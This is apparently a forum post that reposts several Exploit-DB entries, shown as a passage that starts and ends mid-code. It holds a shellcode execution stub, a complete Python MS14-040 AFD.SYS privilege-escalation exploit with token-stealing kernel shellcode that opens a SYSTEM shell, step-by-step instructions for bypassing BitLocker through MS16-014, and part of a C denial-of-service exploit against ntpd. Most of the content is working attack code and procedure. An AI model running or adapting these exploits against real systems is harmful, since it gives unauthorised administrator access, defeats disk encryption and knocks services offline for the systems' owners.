0x74697845 ; Exit push esp push ebx ; kernel32.dll base address call edx ; GetProc(Exec) xor ecx, ecx ; ECX = 0 push ecx ; Return code = 0 call eax ; ExitProcess */ #include "stdafx.h" #include <Windows.h> int main() { char *shellcode = "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75" "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68" "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73" "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68" "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9" "\x41" // inc ecx - Remove this to restore the functionality "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61" "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0"; // Set memory as executable DWORD old = 0; BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old); // Call the shellcode __asm { jmp shellcode; } return 0; }

Microsoft Windows - AFD.SYS Dangling Pointer Privilege Escalation (MS14-040) # Exploit Title: MS14-040 - AFD.SYS Dangling Pointer # Date: 2016-02-05 # Exploit Author: Rick Larabee # Vendor Homepage: www.microsoft.com # Version: Windows 7, 32 bit # Tested on: Win7 x32 # afd.sys - 6.1.7600.16385 # ntdll.dll - 6.1.7600.16385 # # CVE : CVE-2014-1767 # Category: Local Privilege Escalation # References: # http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf # http://ricklarabee.blogspot.com/ # https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/ # https://technet.microsoft.com/en-us/library/security/ms14-040.aspx # http://www.cvedetails.com/cve/CVE-2014-1767/ # # Greetz: PWN4GEPWN1E, SecurityMook from ctypes import * import socket, time, os, struct, sys from ctypes.wintypes import HANDLE, DWORD kernel32 = windll.kernel32 ntdll = windll.ntdll Psapi = windll.Psapi MEMRES = (0x1000 | 0x2000) PAGEEXE = 0x00000040 Zerobits = c_int(0) RegionSize = c_int(0x1000) written = c_int(0) FakeObjSize = 0xA0 GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 GENERIC_EXECUTE = 0x20000000 GENERIC_ALL = 0x10000000 INVALID_HANDLE_VALUE = -1 WSAGetLastError = windll.Ws2_32.WSAGetLastError WSAGetLastError.argtypes = () WSAGetLastError.restype = c_int SOCKET = c_int WSASocket = windll.Ws2_32.WSASocketA WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD) WSASocket.restype = SOCKET closesocket = windll.Ws2_32.closesocket closesocket.argtypes = (SOCKET,) closesocket.restype = c_int connect = windll.Ws2_32.connect connect.argtypes = (SOCKET, c_void_p, c_int) connect.restype = c_int class sockaddr_in(Structure): _fields_ = [ ("sin_family", c_short), ("sin_port", c_ushort), ("sin_addr", c_ulong), ("sin_zero", c_char * 8), ] def findSysBase(drvname=None): ARRAY_SIZE = 1024 myarray = c_ulong * ARRAY_SIZE lpImageBase = myarray() cb = c_int(1024) lpcbNeeded = c_long() drivername_size = c_long() drivername_size.value = 48 Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) for baseaddy in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddy: Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, drivername_size.value) if drvname: if drivername.value.lower() == drvname: print "[+] Retrieving %s info..." % drvname print "[+] %s base address: %s" % (drvname, hex(baseaddy)) return baseaddy else: if drivername.value.lower().find("krnl") !=-1: print "[+] Retrieving Kernel info..." print "[+] Kernel version:", drivername.value print "[+] Kernel base address: %s" % hex(baseaddy) return (baseaddy, drivername.value) return None def CreateBuffer1(): inbuf1size = 0x30 virtualAddress = 0x18888888 length = 0x20000 inbuf1 = "\x00" * 0x18 + struct.pack("L", virtualAddress) #0x1a inbuf1 += struct.pack("L", length) #0x20 inbuf1 += "\x00" * 0x8 + "\x01" inbuf1 += "\x00" * (inbuf1size - len(inbuf1)) baseadd = c_int(0x1001) dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) kernel32.WriteProcessMemory(-1, 0x1000, inbuf1, inbuf1size, byref(written)) def CreateBuffer2(): inbuf2size = 0x10 addrforbuf2 = 0x0AAAAAAA inbuf2 = "\x01\x00\x00\x00" inbuf2 += struct.pack("L", addrforbuf2) inbuf2 += "\x00" * (inbuf2size -len(inbuf2)) baseadd = c_int(0x2001) dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) kernel32.WriteProcessMemory(-1, 0x2000, inbuf2, inbuf2size, byref(written)) def CreateFakeObject(): print "[+] Print creating fakeobject" fakeobject2addr = 0x2200 fakeobject2 = "\x00"*16 + struct.pack("L", HalDispatchTable+sizeof(c_void_p)-0x1C) fakeobj2size = len(fakeobject2) kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written)) objhead = ("\x00\x00\x00\x00\xa8\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x01\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x16\x00\x08\x00" "\x00\x00\x00\x00\x00\x00\x00\x00") fakeobject = objhead fakeobject += struct.pack("L", fakeobject2addr) + "\x41"*96 + struct.pack("L", HalDispatchTable + sizeof(c_void_p) - 0xB4) fakeobject += "\x41" * (FakeObjSize - len(fakeobject)) kernel32.WriteProcessMemory(-1, 0x2100, fakeobject, FakeObjSize, byref(written)) print "[+] creating socket..." sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0) if sock == -1: print "[-] no luck creating socket!" sys.exit(1) print "[+] got sock 0x%x" % sock addr = sockaddr_in() addr.sin_family = socket.AF_INET addr.sin_port = socket.htons(135) addr.sin_addr = socket.htonl(0x7f000001) connect(sock, byref(addr), sizeof(addr)) print "[+] sock connected." print "\n[+] GO!" (krnlbase, kernelver) = findSysBase() hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += krnlbase print "[+] HalDispatchTable address:", hex(HalDispatchTable) halbase = findSysBase("halmacpi.dll") OS = "7" if OS == "7": HaliQuerySystemInformation = halbase+0x278A2 # Offset for win7 _KPROCESS = "\x50" _TOKEN = "\xf8" _UPID = "\xb4" _APLINKS = "\xb8" print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation) IoStatus = c_ulong() IoStatusBlock = c_ulong() CreateBuffer1() CreateBuffer2() CreateFakeObject() inbuf1 = 0x1000 inbuf2 = 0x2000 hWF = HANDLE(0) FakeWorkerFactoryADDR = 0x2100 # Trigger 1 # afd!afdTransmitFile ntdll.ZwDeviceIoControlFile(sock,None,None,None,byref(IoStatusBlock),0x1207f, inbuf1, 0x30, None, 0x0) CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, None, 0, 0)) ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,None,CompletionPort,INVALID_HANDLE_VALUE,None,None,0,0,0) hWFaddr = hWF print "[+] WorkerFactoryHandle:", hWF.value hWFaddr = int(addressof(hWF)) shellcode_address = 0x00020700 padding = "\x90"*2 HalDispatchTable0x4 = HalDispatchTable + 0x4 _WFValue = struct.pack("L", hWFaddr) sc_pointer = struct.pack("L", shellcode_address+0x4) restore_ptrs = "\x31\xc0" + \ "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x4) tokenstealing = "\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" fixobjheaders = "\x33\xC0" +\ "\x64\x8B\x80\x24\x01\x00\x00" +\ "\x8B\x40\x50" +\ "\x8B\x80\xF4\x00\x00\x00" +\ "\x8B\xD8" +\ "\x8B\x00" +\ "\x8B\x0D" + _WFValue +\ "\x83\xE1\xFC" +\ "\x03\xC9" +\ "\x03\xC1" +\ "\xC7\x00\x00\x00\x00\x00" +\ "\x83\xC3\x30" +\ "\x8B\xC3" +\ "\x8B\x1B" +\ "\x83\xEB\x01" +\ "\x89\x18" +\ "\x5B" +\ "\x5A" +\ "\xC2\x10\x00" shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders shellcode_size = len(shellcode) orig_size = shellcode_size startPage = c_int(0x00020000) kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written)) kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written)) ### Trigger 2 ## afd!AfdTransmitPackets ntdll.ZwDeviceIoControlFile(sock,None,None,None,byref(IoStatusBlock),0x120c3, inbuf2, 0x10, None, 0x0) ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False) ntdll.ZwSetInformationWorkerFactory(hWF, 8, shellcode_address, sizeof(c_void_p)) ; inp = c_ulong() out = c_ulong() inp = 0x1337 qip = ntdll.NtQueryIntervalProfile(inp, byref(out)) print "[*] Spawning a SYSTEM shell..." os.system("cmd.exe /K cd c:\\windows\\system32") Sursa: https://www.exploit-db.com/exploits/39446/

Windows Kerberos Security Feature Bypass (MS16-014) # Exploit Title: Windows Kerberos Security Feature Bypass # Date: 12-02-2016 # Exploit Author: Nabeel Ahmed # Tested on: Windows 7 Professional (x32/x64) # CVE : CVE-2016-0049 # Category: Local Exploit 1) Prerequisites: - Standard Windows 7 Fully patched and member of an existing domain. - BitLocker enabled without PIN or USB key. - Password Caching enabled - Victim has cached credentials stored on the system from previous logon. 2) Reproduce: STEP 1: Obtain physical access to a desktop or laptop with the above configuration. STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1) STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local). STEP 4: Create User with similar name as the previously logged in user. (E.g domain\USER1), and force user to change password upon next login. STEP 5: Create Computer Object in Active Directory with the same name as the target system. (E.g CLIENT) STEP 6: Use ADSI Edit and change the attribute ServicePrincipleName of the Computer Object you created in STEP 5, Add the FQDN as following (HOST/CLIENT.domain.local). STEP 7: Establish network connection between the target system and the newly created Domain Controller. STEP 8: Login with the password defined in STEP 4. STEP 9: Target system displays change password screen, set new password and confirm. STEP 10: Message "Your Password has been changed" is displayed, followed by the following error message "The trust relationship between this workstation and the primary domain failed." STEP 11: Disconnect Target system's network connection. STEP 12: Login with the new changed password. 3) Impact: Access gained to the information stored to the FDE target system without previous knowledge of password or any other information. 4) Solution: Install the latest patches from 09-02-2016 using Windows Update. 5) References: https://technet.microsoft.com/en-us/library/security/ms16-014.aspx https://support.microsoft.com/en-us/kb/3134228 6) Credits: Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com) Sursa: https://www.exploit-db.com/exploits/39442/

Ntpd <= ntp-4.2.6p5 - ctl_putdata() Buffer Overflow /* Ntpd <= ntp-4.2.6p5 ctl_putdata() Buffer Overflow Author: Marcin Kozlowski <marcinguy@yahoo.com> Based on: ntpq client from ntp package Provided for legal security research and testing purposes ONLY PoC DoS (Denial of Service) PoC. Will crash NTPd. You will need to know the KEY ID and MD5 password, for example put this in you ntp.conf -------------- /etc/ntp.conf -------------- keys /etc/ntp.keys trustedkey 1 requestkey 1 controlkey 1 and in /etc/ntp.keys ------------- /etc/ntp.keys ------------- 1 M 1111111 1 is KEY ID 1111111 is MD5 password Hostname and Port is hardcoded in the code. Change it if you want :) gcc ntpd-exp.c -o ntpd-exp ./ntpd-exp Keyid: 1 MD5 Password: Sending 988 octets Packet data: 16 08 00 00 00 00 00 00 00 00 03 b7 73 65 74 76 ... 00 00 00 01 28 05 99 c2 16 ba a7 b7 8d d3 22 00 0c f7 6a 5f Sending 36 octets Packet data: 16 02 00 00 00 00 00 00 00 00 00 01 41 00 00 00 00 00 00 01 7b a5 e6 6e e7 a7 f7 cd 65 8f 1d 5f 51 92 d0 41 KABOOM Ntpd should crash!!! GDB output: Program received signal SIGSEGV, Segmentation fault. read_variables (rbufp=<optimized out>, restrict_mask=<optimized out>) at ntp_control.c:2300 2300 for (i = 0; ext_sys_var && (gdb) If you want to bypass knowing KEY ID and MD5 Password and execute your payload, read more: http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html */ #include <stdio.h> #include <ctype.h> #include <sys/types.h> #include <sys/time.h> #include <stdint.h> #include <stddef.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> typedef unsigned short associd_t; /* association ID */ typedef uint32_t keyid_t; typedef int SOCKET; struct sockaddr_in serverAddr; socklen_t addr_size; #define CTL_MAX_DATA_LEN 1300 #define MAX_MAC_LEN (6 * sizeof(uint32_t)) /* SHA */ #define MODE_CONTROL 6 /* control mode */ #define CTL_OP_CONFIGURE 8 #define CTL_OP_READVAR 2 #define CTL_OP_MASK 0x1f #define NID_md5 4 #define NTP_MAXKEY 65535 /* * Stuff for putting things back into li_vn_mode */ #define PKT_LI_VN_MODE(li, vn, md) \ ((u_char)((((li) << 6) & 0xc0) | (((vn) << 3) & 0x38) | ((md) & 0x7))) #define F1(x, y, z) (z ^ (x & (y ^ z))) #define F2(x, y, z) F1(z, x, y) #define F3(x, y, z) (x ^ y ^ z) #define F4(x, y, z) (y ^ (x | ~z)) #define MD5STEP(f,w,x,y,z,in,s) \ (w += f(x,y,z) + in, w = (w<<s | w>>(32-s)) + x) struct ntp_control { u_char li_vn_mode; /* leap, version, mode */ u_char r_m_e_op; /* response, more, error, opcode */ u_short sequence; /* sequence number of request */ u_short status; /* status word for association */ associd_t associd; /* association ID */ u_short offset; /* offset of this batch of data */ u_short count; /* count of data in this packet */ u_char data[(1300 + MAX_MAC_LEN)]; /* data + auth */ }; #define NTP_OLDVERSION ((u_char)1) u_char pktversion = NTP_OLDVERSION + 1; #define CTL_HEADER_LEN (offsetof(struct ntp_control, data)) /* * COUNTOF(array) - size of array in elements */ #define COUNTOF(arr) (sizeof(arr) / sizeof((arr)[0])) /* * Sequence number used for requests. It is incremented before * it is used. */ u_short sequence; /* * Flag which indicates we should always send authenticated requests */ int always_auth = 0; /* * Keyid used for authenticated requests. Obtained on the fly. */ u_long info_auth_keyid = 0; static int info_auth_keytype = NID_md5; /* MD5 */ static size_t info_auth_hashlen = 16; /* MD5 */ int debug = 10; SOCKET sockfd; /* fd socket is opened on */ char currenthost[256]; /* current host name */ char *progname = "exp"; struct savekey { struct savekey *next; union { u_char MD5_key[64]; /* for keys up to to 512 bits */ } k; keyid_t keyid; /* key identifier */ int type; /* key type */ u_short flags; /* flags that wave */ u_long lifetime; /* remaining lifetime */ int keylen; /* key length */ }; /* * The key cache. We cache the last key we looked at here. */ keyid_t cache_keyid; /* key identifier */ u_char *cache_key; /* key pointer */ u_int cache_keylen; /* key length */ int cache_type; /* key type */ u_short cache_flags; /* flags that wave */ #define KEY_TRUSTED 0x001 /* this key is trusted */ #define MEMINC 12 #define EVP_MAX_MD_SIZE 64 typedef struct { uint32_t buf[4]; uint32_t bytes[2]; uint32_t in[16]; } isc_md5_t; /* * ntp_md5.h: deal with md5.h headers * * Use the system MD5 if available, otherwise libisc's. */ typedef isc_md5_t MD5_CTX; #define MD5Init(c) isc_md5_init(c) #define MD5Update(c, p, s) isc_md5_update(c, p, s) #define MD5Final(d, c) isc_md5_final((c), (d)) /* swapped */ /* ssl_init.c */ #ifdef OPENSSL extern void ssl_init (void); extern void ssl_check_version (void); extern int ssl_init_done; #define INIT_SSL() \ do { \ if (!ssl_init_done) \ ssl_init(); \ } while (0) #else /* !OPENSSL follows */ #define INIT_SSL() do {} while (0) #endif #if defined HAVE_MD5_H && defined HAVE_MD5INIT # include <md5.h> #else typedef isc_md5_t MD5_CTX; # define MD5Init(c) isc_md5_init(c) # define MD5Update(c, p, s) isc_md5_update(c, p, s) # define MD5Final(d, c) isc_md5_final((c), (d)) /* swapped */ #endif /* * Provide OpenSSL-alike MD5 API if we're not using OpenSSL */ typedef MD5_CTX EVP_MD_CTX; #define EVP_get_digestbynid(t) NULL #define EVP_DigestInit(c, dt) MD5Init(c) #define EVP_DigestUpdate(c, p, s) MD5Update(c, p, s) #define EVP_DigestFinal(c, d, pdl) \ do { \ MD5Final((d), (c)); \ *(pdl) = 16; \ } while (0) /* * The hash table. This is indexed by the low order bits of the * keyid. We make this fairly big for potentially busy servers. */ #define HASHSIZE 64 #define HASHMASK ((HASHSIZE)-1) #define KEYHASH(keyid) ((keyid) & HASHMASK) #define min(a,b) (((a) < (b)) ? (a) : (b)) struct savekey *key_hash[HASHSIZE]; u_long authkeynotfound; /* keys not found */ u_long authkeylookups; /* calls to lookup keys */ u_long authnumkeys; /* number of active keys */ u_long authkeyexpired; /* key lifetime expirations */ u_long authkeyuncached; /* cache misses */ u_long authnokey; /* calls to encrypt with no key */ u_long authencryptions; /* calls to encrypt */ u_long authdecryptions; /* calls to decrypt */ struct savekey *authfreekeys; int authnumfreekeys; u_long current_time; /*! * The core of the MD5 algorithm, this alters an existing MD5 hash to * reflect the addition of 16 longwords of new data. MD5Update blocks * the data and converts bytes into longwords for this routine. */ void transform(uint32_t buf[4], uint32_t const in[16]) { register uint32_t a, b, c, d; a = buf[0]; b = buf[1]; c = buf[2]; d = buf[3]; MD5STEP(F1, a, b, c, d, in[0] + 0xd76aa478, 7); MD5STEP(F1, d, a, b, c, in[1] + 0xe8c7b756, 12); MD5STEP(F1, c, d, a, b, in[2] + 0x242070db, 17); MD5STEP(F1, b, c, d, a, in[3] + 0xc1bdceee, 22); MD5STEP(F1, a, b, c, d, in[4] + 0xf57c0faf, 7); MD5STEP(F1, d, a, b, c, in[5] + 0x4787c62a, 12); MD5STEP(F1, c, d, a, b, in[6] + 0xa8304613, 17); MD5STEP(F1, b, c, d, a, in[7] + 0xfd469501, 22); MD5STEP(F1, a, b, c, d, in[8] + 0x698098d8, 7); MD5STEP(F1, d, a, b, c, in[9] + 0x8b44f7af, 12); MD5STEP(F1, c, d, a, b, in[10] + 0xffff5bb1, 17); MD5STEP(F1, b, c, d, a, in[11] + 0x895cd7be, 22); MD5STEP(F1, a, b, c, d, in[12] + 0x6b901122, 7); MD5STEP(F1, d, a, b, c, in[13] + 0xfd987193, 12); MD5STEP(F1, c, d, a, b, in[14] + 0xa679438e, 17); MD5STEP(F1, b, c, d, a, in[15] + 0x49b40821, 22); MD5STEP(F2, a, b, c, d, in[1] + 0xf61e2562, 5); MD5STEP(F2, d, a, b, c, in[6] + 0xc040b340, 9); MD5STEP(F2, c, d, a, b, in[11] + 0x265e5a51, 14); MD5STEP(F2, b, c, d, a, in[0] + 0xe9b6c7aa, 20); MD5STEP(F2, a, b, c, d, in[5] + 0xd62f105d, 5); MD5STEP(F2, d, a, b, c, in[10] + 0x02441453, 9); MD5STEP(F2, c, d, a, b, in[15] + 0xd8a1e681, 14); MD5STEP(F2, b, c, d, a, in[4] + 0xe7d3fbc8, 20); MD5STEP(F2, a, b, c, d, in[9] + 0x21e1cde6, 5); MD5STEP(F2, d, a, b, c, in[14] + 0xc33707d6, 9); MD5STEP(F2, c, d, a, b, in[3] + 0xf4d50d87, 14); MD5STEP(F2, b, c, d, a, in[8] + 0x455a14ed, 20); MD5STEP(F2, a, b, c, d, in[13] + 0xa9e3e905, 5); MD5STEP(F2, d, a, b, c, in[2] + 0xfcefa3f8, 9); MD5STEP(F2, c, d, a, b, in[7] + 0x676f02d9, 14); MD5STEP(F2, b, c, d, a, in[12] + 0x8d2a4c8a, 20); MD5STEP(F3, a, b, c, d, in[5] + 0xfffa3942, 4); MD5STEP(F3, d, a, b, c, in[8] + 0x8771f681, 11); MD5STEP(F3, c, d, a, b, in[11] + 0x6d9d6122, 16); MD5STEP(F3, b, c, d, a, in[14] + 0xfde5380c, 23); MD5STEP(F3, a, b, c, d, in[1] + 0xa4beea44, 4); MD5STEP(F3, d, a, b, c, in[4] + 0x4bdecfa9, 11); MD5STEP(F3, c, d, a, b, in[7] + 0xf6bb4b60, 16); MD5STEP(F3, b, c, d, a, in[10] + 0xbebfbc70, 23); MD5STEP(F3, a, b, c, d, in[13] + 0x289b7ec6, 4); MD5STEP(F3, d, a, b, c, in[0] + 0xeaa127fa, 11); MD5STEP(F3, c, d, a, b, in[3] + 0xd4ef3085, 16); MD5STEP(F3, b, c, d, a, in[6] + 0x04881d05, 23); MD5STEP(F3, a, b, c, d, in[9] + 0xd9d4d039, 4); MD5STEP(F3, d, a, b, c, in[12] + 0xe6db99e5, 11); MD5STEP(F3, c, d, a, b, in[15] + 0x1fa27cf8, 16); MD5STEP(F3, b, c, d, a, in[2] + 0xc4ac5665, 23); MD5STEP(F4, a, b, c, d, in[0] + 0xf4292244, 6); MD5STEP(F4, d, a, b, c, in[7] + 0x432aff97, 10); MD5STEP(F4, c, d, a, b, in[14] + 0xab9423a7, 15); MD5STEP(F4, b, c, d, a, in[5] + 0xfc93a039, 21); MD5STEP(F4, a, b, c, d, in[12] + 0x655b59c3, 6); MD5STEP(F4, d, a, b, c, in[3] + 0x8f0ccc92, 10); MD5STEP(F4, c, d, a, b, in[10] + 0xffeff47d, 15); MD5STEP(F4, b, c, d, a, in[1] + 0x85845dd1, 21); MD5STEP(F4, a, b, c, d, in[8] + 0x6fa87e4f, 6); MD5STEP(F4, d, a, b, c, in[15] + 0xfe2ce6e0, 10); MD5STEP(F4, c, d, a, b, in[6] + 0xa3014314, 15); MD5STEP(F4, b, c, d, a, in[13] + 0x4e0811a1, 21); MD5STEP(F4, a, b, c, d, in[4] + 0xf7537e82, 6); MD5STEP(F4, d, a, b, c, in[11] + 0xbd3af235, 10); MD5STEP(F4, c, d, a, b, in[2] + 0x2ad7d2bb, 15); MD5STEP(F4, b, c, d, a, in[9] + 0xeb86d391, 21); buf[0] += a; buf[1] += b; buf[2] += c; buf[3] += d; } void byteSwap(uint32_t *buf, unsigned words) { unsigned char *p = (unsigned char *)buf; do { *buf++ = (uint32_t)((unsigned)p[3] << 8 | p[2]) << 16 | ((unsigned)p[1] << 8 | p[0]); p += 4; } while (--words); } /*! * Final wrapup - pad to 64-byte boundary with the bit pattern * 1 0* (64-bit count of bits processed, MSB-first) */ void isc_md5_final(isc_md5_t *ctx, unsigned char *digest) { int count = ctx->bytes[0] & 0x3f; /* Number of bytes in ctx->in */ unsigned char *p = (unsigned char *)ctx->in + count; /* Set the first char of padding to 0x80. There is always room. */ *p++ = 0x80; /* Bytes of padding needed to make 56 bytes (-8..55) */ count = 56 - 1 - count; if (count < 0) { /* Padding forces an extra block */ memset(p, 0, count + 8); byteSwap(ctx->in, 16); transform(ctx->buf, ctx->in); p = (unsigned char *)ctx->in; count = 56; } memset(p, 0, count); byteSwap(ctx->in, 14); /* Append length in bits and transform */ ctx->in[14] = ctx->bytes[0] << 3; ctx->in[15] = ctx->bytes[1] << 3 | ctx->bytes[0] >> 29; transform(ctx->buf, ctx->in); byteSwap(ctx->buf, 4); memcpy(digest, ctx->buf, 16); memset(ctx, 0, sizeof(isc_md5_t)); /* In case it's sensitive */ } /*! * Update context to reflect the concatenation of another buffer full * of bytes. */ void isc_md5_update(isc_md5_t *ctx, const unsigned char *buf, unsigned int len) { uint32_t t; /* Update byte count */ t = ctx->bytes[0]; if ((ctx->bytes[0] = t + len) < t) ctx->bytes[1]++; /* Carry from low to high */ t = 64 - (t & 0x3f); /* Space available in ctx->in (at least 1) */ if (t > len) { memcpy((unsigned char *)ctx->in + 64 - t, buf, len); return; } /* First chunk is an odd size */ memcpy((unsigned char *)ctx->in + 64 - t, buf, t); byteSwap(ctx->in, 16); transform(ctx->buf, ctx->in); buf += t; len -= t; /* Process data in 64-byte chunks */ while (len >= 64) { memcpy(ctx->in, buf, 64); byteSwap(ctx->in, 16); transform(ctx->buf, ctx->in); buf += 64; len -= 64; } /* Handle any remaining bytes of data. */ memcpy(ctx->in, buf, len); } /*! * Start MD5 accumulation. Set bit count to 0 and buffer to mysterious * initialization constants. */ void isc_md5_init(isc_md5_t *ctx) { ctx->buf[0] = 0x67452301; ctx->buf[1] = 0xefcdab89; ctx->buf[2] = 0x98badcfe; ctx->buf[3] = 0x10325476; ctx->bytes[0] = 0; ctx->bytes[1] = 0; } /* * MD5authencrypt - generate message digest * * Returns length of MAC including key ID and digest. */ int MD5authencrypt( int type, /* hash algorithm */ u_char *key, /* key pointer */ uint32_t *pkt, /* packet pointer */ int length /* packet length */ ) { u_char digest[EVP_MAX_MD_SIZE]; u_int len; EVP_MD_CTX ctx; /* * Compute digest of key concatenated with packet. Note: the * key type and digest type have been verified when the key * was creaded. */ INIT_SSL(); EVP_DigestInit(&ctx, EVP_get_digestbynid(type)); EVP_DigestUpdate(&ctx, key, (u_int)cache_keylen); EVP_DigestUpdate(&ctx, (u_char *)pkt, (u_int)length); EVP_DigestFinal(&ctx, digest, &len); memmove((u_char *)pkt + length + 4, digest, len); return (len + 4); } /* * authhavekey - return one and cache the key, if known and trusted. */ int authhavekey( keyid_t keyno ) { struct savekey *sk; authkeylookups++; if (keyno == 0 || keyno == cache_keyid) return (1); /* * Seach the bin for the key. If found and the key type * is zero, somebody marked it trusted without specifying * a key or key type. In this case consider the key missing. */ authkeyuncached++; sk = key_hash[KEYHASH(keyno)]; while (sk != NULL) { if (keyno == sk->keyid) { if (sk->type == 0) { authkeynotfound++; return (0); } break; } sk = sk->next; } /* * If the key is not found, or if it is found but not trusted, * the key is not considered found. */ if (sk == NULL) { authkeynotfound++; return (0); } if (!(sk->flags & KEY_TRUSTED)) { authnokey++; return (0); } /* * The key is found and trusted. Initialize the key cache. */ cache_keyid = sk->keyid; cache_type = sk->type; cache_flags = sk->flags; cache_key = sk->k.MD5_key; cache_keylen = sk->keylen; return (1); } /* * authencrypt - generate message authenticator * * Returns length of authenticator field, zero if key not found. */ int authencrypt( keyid_t keyno, uint32_t *pkt, int length ) { /* * A zero key identifier means the sender has not verified * the last message was correctly authenticated. The MAC * consists of a single word with value zero. */ authencryptions++; pkt[length / 4] = htonl(keyno); if (keyno == 0) { return (4); } if (!authhavekey(keyno)) return (0); return (MD5authencrypt(cache_type, cache_key, pkt, length)); } /* * authtrust - declare a key to be trusted/untrusted */ void authtrust( keyid_t keyno, u_long trust ) { struct savekey *sk; /* * Search bin for key; if it does not exist and is untrusted, * forget it. */ sk = key_hash[KEYHASH(keyno)]; while (sk != 0) { if (keyno == sk->keyid) break; sk = sk->next; } if (sk == 0 && !trust) return; /* * There are two conditions remaining. Either it does not * exist and is to be trusted or it does exist and is or is * not to be trusted. */ if (sk != 0) { if (cache_keyid == keyno) { cache_flags = 0; cache_keyid = 0; } /* * Key exists. If it is to be trusted, say so and * update its lifetime. If not, return it to the * free list. */ if (trust > 0) { sk->flags |= KEY_TRUSTED; if (trust > 1) sk->lifetime = current_time + trust; else sk->lifetime = 0; return; } sk->flags &= ~KEY_TRUSTED; { struct savekey *skp; skp = key_hash[KEYHASH(keyno)]; if (skp == sk) { key_hash[KEYHASH(keyno)] = sk->next; } else { while (skp->next != sk) skp = skp->next; skp->next = sk->next; } authnumkeys--; sk->next = authfreekeys; authfreekeys = sk; authnumfreekeys++; } return; } /* * Here there is not key, but the key is to be trusted. There * seems to be a disconnect here. Here we allocate a new key, * but do not specify a key type, key or key length. */ if (authnumfreekeys == 0) if (auth_moremem() == 0) return; sk = authfreekeys; authfreekeys = sk->next; authnumfreekeys--; sk->keyid = keyno; sk->type = 0; sk->keylen = 0; sk->flags = KEY_TRUSTED; sk->next = key_hash[KEYHASH(keyno)]; key_hash[KEYHASH(keyno)] = sk; authnumkeys++; return; } /* * auth_moremem - get some more free key structures */ int auth_moremem(void) { struct savekey *sk; int i; sk = (struct savekey *)calloc(MEMINC, sizeof(struct savekey)); if (sk == 0) return (0); for (i = MEMINC; i > 0; i--) { sk->next = authfreekeys; authfreekeys = 